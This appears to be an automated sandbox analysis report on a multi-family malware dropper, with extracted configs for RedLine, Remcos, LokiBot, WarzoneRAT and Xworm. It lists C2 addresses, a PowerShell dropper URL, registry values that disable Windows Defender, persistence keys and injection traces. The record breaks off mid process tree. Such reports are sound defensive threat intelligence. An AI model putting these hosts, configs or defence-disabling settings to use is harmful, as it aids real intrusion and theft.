amadey | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
13s
max time network
337s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
05-06-2023 13:48

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score

10^/10

amadey lokibot redline remcos warzonerat xworm @germany diza imcomplx spam remotehost collection evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

redline

Botnet

diza

83.97.73.126:19048

Attributes

auth_value
0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

remcos

Botnet

Imcomplx Spam

mmnedgeggrrva.com:333

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
CvaYhtj-O4TVO8
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

lokibot

http://194.180.48.58/morgan/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

http://161.35.102.56/~nikol/?p=2132

http://171.22.30.147/chang2/five/fre.php

Extracted

Family

warzonerat

103.212.81.157:11011

Extracted

Family

remcos

Botnet

RemoteHost

pekonomia.duckdns.org:30861

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B0VP4N
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

redline

Botnet

@Germany

185.81.68.115:2920

Attributes

auth_value
9d15d78194367a949e54a07d6ce02c62

Extracted

Family

xworm

62.171.178.45:7000

Attributes

install_file
USB.exe

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

dd4add6r.s6xlt.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	dd4add6r.s6xlt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	dd4add6r.s6xlt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	dd4add6r.s6xlt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	dd4add6r.s6xlt.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	dd4add6r.s6xlt.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 24 IoCs

Processes:

resource	yara_rule
behavioral1/memory/660-247-0x0000000002480000-0x00000000024CA000-memory.dmp	family_redline
behavioral1/memory/660-251-0x0000000004EA0000-0x0000000004EE6000-memory.dmp	family_redline
behavioral1/memory/660-260-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-262-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-277-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-270-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-280-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-283-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-293-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-296-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-307-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-303-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-291-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-312-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-316-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-320-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/4212-323-0x0000000004710000-0x000000000473C000-memory.dmp	family_redline
behavioral1/memory/660-322-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-326-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-330-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/4212-327-0x0000000006AD0000-0x0000000006AF8000-memory.dmp	family_redline
behavioral1/memory/660-350-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-345-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline
behavioral1/memory/660-338-0x0000000004EA0000-0x0000000004EE2000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Warzone RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/216-294-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat
behavioral1/memory/216-306-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat
behavioral1/memory/216-302-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 2 IoCs

Processes:

DllHost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffp.exe	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffp.exe	DllHost.exe

Executes dropped EXE 19 IoCs

Processes:

cache_cleaner.exeddsc.exefoto124.exex0434011.exex1316114.exef4995985.exefotod25.exey9586431.exey8547919.exek8132957.exea2592d.exesecmorganzx.exeeee23xe.exea2592d.exehkcmd.exeeee23xe.exeAppLaunch.exeH2.exe2.exe

pid	process
4128	cache_cleaner.exe
3808	ddsc.exe
1264	foto124.exe
4424	x0434011.exe
4444	x1316114.exe
4484	f4995985.exe
1920	fotod25.exe
3552	y9586431.exe
5008	y8547919.exe
5052	k8132957.exe
3408	a2592d.exe
4936	secmorganzx.exe
872	eee23xe.exe
660	a2592d.exe
680	hkcmd.exe
1460	eee23xe.exe
1840	AppLaunch.exe
2716	H2.exe
4212	2.exe

Loads dropped DLL 1 IoCs

Processes:

eee23xe.exe

pid process

872 eee23xe.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

dd4add6r.s6xlt.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" dd4add6r.s6xlt.exe

pid	process
872	eee23xe.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	dd4add6r.s6xlt.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

secmorganzx.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	secmorganzx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	secmorganzx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	secmorganzx.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

x0434011.exex1316114.exey9586431.exey8547919.exefoto124.exefotod25.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x0434011.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	x1316114.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y9586431.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	y9586431.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	y8547919.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto124.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	foto124.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x0434011.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x1316114.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotod25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	fotod25.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y8547919.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

89 api.ipify.org
163 ipinfo.io
166 ipinfo.io
178 ip-api.com
587 ip-api.com
62 checkip.dyndns.org
79 checkip.dyndns.org

flow	ioc
89	api.ipify.org
163	ipinfo.io
166	ipinfo.io
178	ip-api.com
587	ip-api.com
62	checkip.dyndns.org
79	checkip.dyndns.org

Suspicious use of SetThreadContext 4 IoCs

Processes:

a2592d.exeeee23xe.exea02.exeH2.exe

description	pid	process	target process
PID 3408 set thread context of 660	3408	a2592d.exe	a2592d.exe
PID 872 set thread context of 1460	872	eee23xe.exe	eee23xe.exe
PID 1840 set thread context of 216	1840	a02.exe	Caspol.exe
PID 2716 set thread context of 2840	2716	H2.exe	aspnet_compiler.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

344 sc.exe
1812 sc.exe
5408 sc.exe
7148 sc.exe
6424 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
344	sc.exe
1812	sc.exe
5408	sc.exe
7148	sc.exe
6424	sc.exe

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
912	3976	WerFault.exe	cc.exe
6048	516	WerFault.exe	certreq.exe
5600	6064	WerFault.exe	Firefox.exe
5616	5392	WerFault.exe	c1590977.exe
3560	7128	WerFault.exe	tg.exe
7108	6696	WerFault.exe	Firefox.exe
6604	6928	WerFault.exe	rundll32.exe
580	2436	WerFault.exe	mslink1.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

7136 schtasks.exe
1776 schtasks.exe
7092 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6744 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1692 tasklist.exe

pid	process
7136	schtasks.exe
1776	schtasks.exe
7092	schtasks.exe

pid	process
6744	timeout.exe

pid	process
1692	tasklist.exe

GoLang User-Agent 7 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	198	Go-http-client/1.1
HTTP User-Agent header	200	Go-http-client/1.1
HTTP User-Agent header	214	Go-http-client/1.1
HTTP User-Agent header	216	Go-http-client/1.1
HTTP User-Agent header	190	Go-http-client/1.1
HTTP User-Agent header	191	Go-http-client/1.1
HTTP User-Agent header	196	Go-http-client/1.1

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5732 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2836 PING.EXE

pid	process
5732	taskkill.exe

pid	process
2836	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

Processes:

ddsc.exedd4add6r.s6xlt.exea02.exeH2.exe

pid	process
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
3808	ddsc.exe
5052	dd4add6r.s6xlt.exe
5052	dd4add6r.s6xlt.exe
1840	a02.exe
1840	a02.exe
1840	a02.exe
1840	a02.exe
2716	H2.exe
2716	H2.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

eee23xe.exe

pid process

872 eee23xe.exe

pid	process
872	eee23xe.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

a.execache_cleaner.exedd4add6r.s6xlt.exea2592d.exea02.exesecmorganzx.exeH2.exe

description	pid	process
Token: SeDebugPrivilege	4672	a.exe
Token: SeDebugPrivilege	4128	cache_cleaner.exe
Token: SeDebugPrivilege	5052	dd4add6r.s6xlt.exe
Token: SeDebugPrivilege	660	a2592d.exe
Token: SeDebugPrivilege	1840	a02.exe
Token: SeDebugPrivilege	4936	secmorganzx.exe
Token: SeDebugPrivilege	2716	H2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a.exefoto124.exex0434011.exex1316114.exeddsc.exefotod25.exey9586431.exey8547919.exea2592d.exe

description	pid	process	target process
PID 4672 wrote to memory of 4128	4672	a.exe	cache_cleaner.exe
PID 4672 wrote to memory of 4128	4672	a.exe	cache_cleaner.exe
PID 4672 wrote to memory of 4128	4672	a.exe	cache_cleaner.exe
PID 4672 wrote to memory of 3808	4672	a.exe	ddsc.exe
PID 4672 wrote to memory of 3808	4672	a.exe	ddsc.exe
PID 4672 wrote to memory of 3808	4672	a.exe	ddsc.exe
PID 4672 wrote to memory of 1264	4672	a.exe	foto124.exe
PID 4672 wrote to memory of 1264	4672	a.exe	foto124.exe
PID 4672 wrote to memory of 1264	4672	a.exe	foto124.exe
PID 1264 wrote to memory of 4424	1264	foto124.exe	x0434011.exe
PID 1264 wrote to memory of 4424	1264	foto124.exe	x0434011.exe
PID 1264 wrote to memory of 4424	1264	foto124.exe	x0434011.exe
PID 4424 wrote to memory of 4444	4424	x0434011.exe	x1316114.exe
PID 4424 wrote to memory of 4444	4424	x0434011.exe	x1316114.exe
PID 4424 wrote to memory of 4444	4424	x0434011.exe	x1316114.exe
PID 4444 wrote to memory of 4484	4444	x1316114.exe	f4995985.exe
PID 4444 wrote to memory of 4484	4444	x1316114.exe	f4995985.exe
PID 4444 wrote to memory of 4484	4444	x1316114.exe	f4995985.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 3808 wrote to memory of 4572	3808	ddsc.exe	pipanel.exe
PID 4672 wrote to memory of 1920	4672	a.exe	fotod25.exe
PID 4672 wrote to memory of 1920	4672	a.exe	fotod25.exe
PID 4672 wrote to memory of 1920	4672	a.exe	fotod25.exe
PID 1920 wrote to memory of 3552	1920	fotod25.exe	y9586431.exe
PID 1920 wrote to memory of 3552	1920	fotod25.exe	y9586431.exe
PID 1920 wrote to memory of 3552	1920	fotod25.exe	y9586431.exe
PID 3552 wrote to memory of 5008	3552	y9586431.exe	y8547919.exe
PID 3552 wrote to memory of 5008	3552	y9586431.exe	y8547919.exe
PID 3552 wrote to memory of 5008	3552	y9586431.exe	y8547919.exe
PID 5008 wrote to memory of 5052	5008	y8547919.exe	k8132957.exe
PID 5008 wrote to memory of 5052	5008	y8547919.exe	k8132957.exe
PID 4672 wrote to memory of 3408	4672	a.exe	a2592d.exe
PID 4672 wrote to memory of 3408	4672	a.exe	a2592d.exe
PID 4672 wrote to memory of 3408	4672	a.exe	a2592d.exe
PID 4672 wrote to memory of 4936	4672	a.exe	secmorganzx.exe
PID 4672 wrote to memory of 4936	4672	a.exe	secmorganzx.exe
PID 4672 wrote to memory of 4936	4672	a.exe	secmorganzx.exe
PID 4672 wrote to memory of 872	4672	a.exe	eee23xe.exe
PID 4672 wrote to memory of 872	4672	a.exe	eee23xe.exe
PID 4672 wrote to memory of 872	4672	a.exe	eee23xe.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe
PID 3408 wrote to memory of 660	3408	a2592d.exe	a2592d.exe

outlook_office_path 1 IoCs

Processes:

secmorganzx.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	secmorganzx.exe

outlook_win_path 1 IoCs

Processes:

secmorganzx.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	secmorganzx.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672

C:\Users\Admin\AppData\Local\Temp\a\cache_cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\a\cache_cleaner.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Users\Admin\AppData\Local\Temp\a\ddsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\ddsc.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3808

C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
"C:\Users\Admin\AppData\Local\Temp\a\ddsc.exe"
3⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\a\foto124.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto124.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1264

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x0434011.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x0434011.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4424

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x1316114.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x1316114.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4444

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f4995985.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f4995985.exe
5⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1920

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y9586431.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y9586431.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3552

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8547919.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8547919.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5008

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k8132957.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k8132957.exe
5⤵
- Executes dropped EXE
PID:5052

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l8152026.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l8152026.exe
5⤵
PID:2364

C:\Users\Admin\AppData\Local\Temp\a\a2592d.exe
"C:\Users\Admin\AppData\Local\Temp\a\a2592d.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3408

C:\Users\Admin\AppData\Local\Temp\a\a2592d.exe
"C:\Users\Admin\AppData\Local\Temp\a\a2592d.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe"
2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4936

C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe
"C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:872

C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe
"C:\Users\Admin\AppData\Local\Temp\a\eee23xe.exe"
3⤵
- Executes dropped EXE
PID:1460

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
2⤵
- Executes dropped EXE
PID:680

C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe"
2⤵
PID:1840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\a\H2.exe
"C:\Users\Admin\AppData\Local\Temp\a\H2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:2840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\obaehkzmvemjlk"
4⤵
PID:3580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydgxadkgjneowqsmul"
4⤵
PID:5036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydgxadkgjneowqsmul"
4⤵
PID:3384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydgxadkgjneowqsmul"
4⤵
PID:1752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydgxadkgjneowqsmul"
4⤵
PID:4932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
